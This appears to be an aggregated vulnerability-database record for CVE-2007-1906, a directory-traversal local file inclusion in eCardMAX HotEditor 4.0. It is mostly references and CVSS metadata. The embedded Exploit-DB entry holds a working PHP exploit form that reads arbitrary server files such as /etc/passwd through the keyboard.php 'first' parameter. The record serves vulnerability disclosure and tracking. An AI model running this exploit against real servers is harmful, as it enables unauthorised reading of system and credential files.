ID OSVDB:34776Type osvdbReporter OSVDBModified 2007-04-09T11:18:45
Description
No description provided by the source
References:
Secunia Advisory ID:24825
Other Advisory URL: http://www.expw0rm.com/hot-editor-v40-local-file-inclusion_no113.html
Other Advisory URL: http://www.expw0rm.com/mybb-hot-editor-plugin-local-file-inclusion_no114.html
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-04/0148.html
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-04/0145.html
ISS X-Force ID: 33521
FrSIRT Advisory: ADV-2007-1315
CVE-2007-1906
Bugtraq ID: 23377
{"bulletinFamily": "software", "viewCount": 0, "reporter": "OSVDB", "references": [], "description": "# No description provided by the source\n\n## References:\n[Secunia Advisory ID:24825](https://secuniaresearch.flexerasoftware.com/advisories/24825/)\nOther Advisory URL: http://www.expw0rm.com/hot-editor-v40-local-file-inclusion_no113.html\nOther Advisory URL: http://www.expw0rm.com/mybb-hot-editor-plugin-local-file-inclusion_no114.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-04/0148.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-04/0145.html\nISS X-Force ID: 33521\nFrSIRT Advisory: ADV-2007-1315\n[CVE-2007-1906](https://vulners.com/cve/CVE-2007-1906)\nBugtraq ID: 23377\n", "affectedSoftware": [], "hashmap": [{"key": "affectedSoftware", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "bulletinFamily", "hash": "f9fa10ba956cacf91d7878861139efb9"}, {"key": "cvelist", "hash": "516ea43cee76c586743f9f5d9b6b3cd1"}, {"key": "cvss", "hash": "737e2591b537c46d1ca7ce6f0cea5cb9"}, {"key": "description", "hash": "66318c905d4b4854c71f0043e9961d6b"}, {"key": "href", "hash": "f013c996af47602ef7e8e8ce8e3864fc"}, {"key": "modified", "hash": "1da92b3d38eb56a70dc163a85209948e"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "1da92b3d38eb56a70dc163a85209948e"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "955b328dc7cd615c13af5464c9183464"}, {"key": "title", "hash": "a0459eeac9742d18dbef03d7533f1e9f"}, {"key": "type", "hash": "1327ac71f7914948578f08c54f772b10"}], "href": "https://vulners.com/osvdb/OSVDB:34776", "modified": "2007-04-09T11:18:45", "objectVersion": "1.2", "enchantments": {"score": {"value": 2.1, "vector": "NONE"}, "vulnersScore": 2.1}, "id": "OSVDB:34776", "title": "eCardMAX HotEditor richedit/keyboard.php first Variable Traversal Local File Inclusion", "hash": "7049e504028c8717d780004860f434e7815b306bbad1c622338c72cadcb531a9", "edition": 1, "published": "2007-04-09T11:18:45", "type": "osvdb", "history": [], "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "cvelist": ["CVE-2007-1906"], "lastseen": "2017-04-28T13:20:31"}
{"cve": [{"lastseen": "2017-07-29T11:21:57", "references": ["http://www.securityfocus.com/bid/23377", "http://www.expw0rm.com/hot-editor-v40-local-file-inclusion_no113.html", "http://securityreason.com/securityalert/2533", "http://www.vupen.com/english/advisories/2007/1315", "https://exchange.xforce.ibmcloud.com/vulnerabilities/33521", "http://www.securityfocus.com/archive/1/archive/1/465094/100/0/threaded", "http://www.expw0rm.com/mybb-hot-editor-plugin-local-file-inclusion_no114.html", "http://www.securityfocus.com/archive/1/archive/1/465092/100/0/threaded"], "description": "Directory traversal vulnerability in richedit/keyboard.php in eCardMAX HotEditor (Hot Editor) 4.0, and the HotEditor plugin for MyBB, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the first parameter.", "edition": 2, "reporter": "NVD", "published": "2007-04-10T19:19:00", "title": "CVE-2007-1906", "type": "cve", "enchantments": {"score": {"modified": "2017-07-29T11:21:57", "vector": "NONE", "value": 7.5}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2007-1906"], "scanner": [], "modified": "2017-07-28T21:31:07", "cpe": ["cpe:/a:ecardmax.com:hot_editor:4.0", "cpe:/a:mybb:mybb_hot_editor_plugin"], "id": "CVE-2007-1906", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-1906", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-02-03T11:13:05", "osvdbidlist": ["34776"], "references": [], "edition": 1, "description": "eCardMAX HotEditor 4.0 Keyboard.PHP Local File Include Vulnerability. CVE-2007-1906 . Webapps exploit for php platform", "reporter": "Liz0ziM", "published": "2007-04-09T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "type": "exploitdb", "title": "eCardMAX HotEditor 4.0 Keyboard.PHP Local File Include Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-1906"], "modified": "2007-04-09T00:00:00", "id": "EDB-ID:29827", "href": "https://www.exploit-db.com/exploits/29827/", "sourceData": "source: http://www.securityfocus.com/bid/23377/info\r\n\r\neCardMAX HotEditor is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.\r\n\r\nExploiting this issue may allow an unauthorized user to view files and execute local scripts.\r\n\r\nHotEditor 4.0 is vulnerable; other versions may also be affected. This issue also affects versions that may be integrated into phpBB2, MyBB, Simple Machine Forum, and PunBB Forum.\r\n\r\n<?php\r\n/*\r\nVendor : Liz0ziM\r\nWeb : www.expw0rm.com\r\nMail : liz0@expw0rm.com\r\n---------------------------------------\r\nVul. Code : keyboard.php line 3\r\n\r\n\r\n require_once \"./vk_code/$first\";\r\n----------------------------------------\r\n*/\r\n?>\r\n\r\nHot Editor Local File İnclude Exploit <a \r\nhref=\"http://www.expw0rm.com\">Expw0rm</a> By Liz0ziM<br>\r\n<form method=\"POST\">\r\nTarget Url: <input name=\"url\" type=\"text\"> example: \r\nhttp://victim.com/richedit/<br>\r\nFile :<input name=\"sec\" type=\"text\"> example : \r\n../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd \r\n<br>\r\n<input type=submit name=\"yolla\" value=\"Send\"><br>\r\n<?\r\nif(isset($_POST[yolla]))\r\n{\r\n$url=$_POST[url];\r\n$sec=$_POST[sec];\r\n$git=$url.\"/keyboard.php?first=\".$sec;\r\n$ac=fopen($git,\"r\") or die(\"acamadim\");;\r\n\r\nwhile(!feof($ac) )\r\n{\r\n$cek=fgets($ac,1024);\r\nif(eregi(\"<html>\",$cek)) { echo '<br>Finishim'; exit();}\r\necho '<pre>';\r\necho $cek;\r\necho '</pre>';\r\n}\r\nfclose($ac);\r\n}\r\n?>\r\n\r\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/29827/"}], "securityvulns": [{"lastseen": "2018-08-31T11:09:25", "references": ["https://vulners.com/securityvulns/securityvulns:doc:16676", "https://vulners.com/securityvulns/securityvulns:doc:16672", "https://vulners.com/securityvulns/securityvulns:doc:16675", "https://vulners.com/securityvulns/securityvulns:doc:16678", "https://vulners.com/securityvulns/securityvulns:doc:16682", "https://vulners.com/securityvulns/securityvulns:doc:16674", "https://vulners.com/securityvulns/securityvulns:doc:16684", "https://vulners.com/securityvulns/securityvulns:doc:16685", "https://vulners.com/securityvulns/securityvulns:doc:16671", "https://vulners.com/securityvulns/securityvulns:doc:16673", "https://vulners.com/securityvulns/securityvulns:doc:16677", "https://vulners.com/securityvulns/securityvulns:doc:16679", "https://vulners.com/securityvulns/securityvulns:doc:16683"], "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "edition": 1, "reporter": " ", "published": "2007-04-12T00:00:00", "title": "Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:09:25", "vector": "NONE", "value": 4.3}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "SmodBIP", "version": "1.06", "operator": "eq"}, {"name": "SmodCMS", "version": "2.10", "operator": "eq"}, {"name": "Ichitaro", "version": "2007", "operator": "eq"}, {"name": "ScarAdController", "version": "1.1", "operator": "eq"}, {"name": "PcP-Guestbook", "version": "3.0", "operator": "eq"}, {"name": "Battle.net Clan Script", "version": "1.5", "operator": "eq"}, {"name": "Webspell", "version": "4.01", "operator": "eq"}, {"name": "eCardMAX HotEditor", "version": "4.0", "operator": "eq"}, {"name": "Tru-Zone Nuke ET", "version": "3.4", "operator": "eq"}, {"name": "witshare", "version": "0.9", "operator": "eq"}, {"name": "PHP121 Instant Messenger", "version": "2.2", "operator": "eq"}, {"name": "Scorp Book", "version": "1.0", "operator": "eq"}, {"name": "LanguageTool", "version": "0.8", "operator": "eq"}, {"name": "cattaDoc", "version": "2.21", "operator": "eq"}, {"name": "Phpwiki", "version": "1.3", "operator": "eq"}, {"name": "toendaCMS", "version": "1.5", "operator": "eq"}, {"name": "HIOX GUEST BOOK", "version": "4.0", "operator": "eq"}, {"name": "Beryo", "version": "2.0", "operator": "eq"}], "cvelist": ["CVE-2007-1932", "CVE-2007-1906", "CVE-2007-1936", "CVE-2007-1929", "CVE-2007-1939", "CVE-2007-2025", "CVE-2007-1968", "CVE-2007-1931", "CVE-2007-1938", "CVE-2007-1928", "CVE-2007-1925", "CVE-2007-1871", "CVE-2007-1998", "CVE-2007-1969", "CVE-2007-1933", "CVE-2007-1920", "CVE-2007-1930", "CVE-2007-1909", "CVE-2007-1908", "CVE-2007-2024", "CVE-2007-1935", "CVE-2007-1872"], "modified": "2007-04-12T00:00:00", "id": "SECURITYVULNS:VULN:7570", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:7570", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}}]}
